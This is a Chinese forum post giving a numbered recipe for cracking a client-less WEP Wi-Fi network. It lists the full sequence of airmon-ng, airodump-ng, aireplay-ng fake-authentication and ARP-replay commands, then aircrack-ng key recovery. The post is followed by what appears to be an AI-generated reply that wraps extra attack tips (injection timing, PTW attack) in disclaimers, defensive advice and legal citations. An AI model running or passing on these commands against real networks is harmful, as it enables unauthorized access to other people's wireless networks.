用TP的321G终于成功破解了无客户端WEP加密
1、用附带的USB连接线夹在窗户玻璃旁边2、用光盘启动BT3(偶只有光盘版的,也可用硬盘或者U盘版)
3、开一个SHELL,输入ifconfig -a 无线网卡显示rausb0
4、接着输入ifconfig -a rausb0 up
5、airmon-ng start rausb0 6(开启网卡的monitor模式)(后面的6是AP的工作频道)
6、airodump-ng --ivs -w name -c 6 rausb0(很多人在这一步犯迷糊,因为RT73的芯片要重新拔插一次才能查看你要破解的AP的MAC和essid)
7、aireplay-ng -1 0 -e AP名称 -a APMAC -h MYMAC rausb0连接要破解的AP,捕捉包
8、aireplay-ng -2 -F -p 0841 -e AP名称 -c FFFFFFFFFFFF -b APMAC -h MYMAC -x 128 rausb0
9、DATA达到3W就可以开启解密aircrack-ng -n 64 *.ivs
热门标签聚合BT3 与intel 3945 的重大问题!!! 您的描述涉及使用渗透测试工具进行无线网络安全测试的步骤。需要明确的是,未经授权的网络入侵行为属于违法行为,且WEP加密因其已知漏洞已于2004年被WPA/WPA2取代。以下仅从技术原理角度进行知识性说明,**请务必遵守网络安全法律法规**:
---
### ⚠️ 技术背景说明
1. **WEP的脆弱性**
WEP加密因RC4算法缺陷和IV重用问题,可通过捕获足够多的初始化向量(IV)暴力破解,2005年已有自动化工具实现分钟级破解。
2. **工具链演进**
- BackTrack 3 (BT3) 是Kali Linux前身,现已停止维护
- 现代工具建议使用`aircrack-ng`套件 + Kali Linux
- Intel 3945ABG网卡需使用`ipwraw`驱动(较新的iwlwifi驱动可能需降级)
---
### 技术流程解析(供防御参考)
1. **信号优化**
通过USB延长线调整网卡位置是物理层信号增强技巧,需注意天线极化方向与AP对齐。
2. **驱动兼容性问题**
RT73芯片组需`rt73usb`驱动,部分版本存在注入延迟问题,需`-o 50`参数优化。
3. **无客户端攻击模式**
`aireplay-ng -2`使用ARP重放攻击生成伪造流量,依赖`-p 0841`保留位控制生成有效ARP包。
4. **IV收集优化**
现代攻击可通过PTW攻击(`aircrack-ptw`)将所需IV降至约4万,结合FMS/KoreK攻击可提升效率。
---
### 防御建议(网络管理员视角)
1. **加密协议升级**
强制启用WPA2-AES或WPA3,禁用WEP/TKIP。
2. **无线入侵防御**
部署无线IDS(如Kismet)监测Deauth攻击、异常IV速率。
3. **物理层防护**
使用定向天线控制覆盖范围,监测异常RF信号。
---
### 法律提示
根据《网络安全法》第27/44条,未经授权入侵他人网络系统可处5-15日拘留。建议通过合法授权靶场(如OverTheWire)进行技术研究。
如需进一步了解无线安全防护方案,建议参考OWASP无线安全指南。
页:
[1]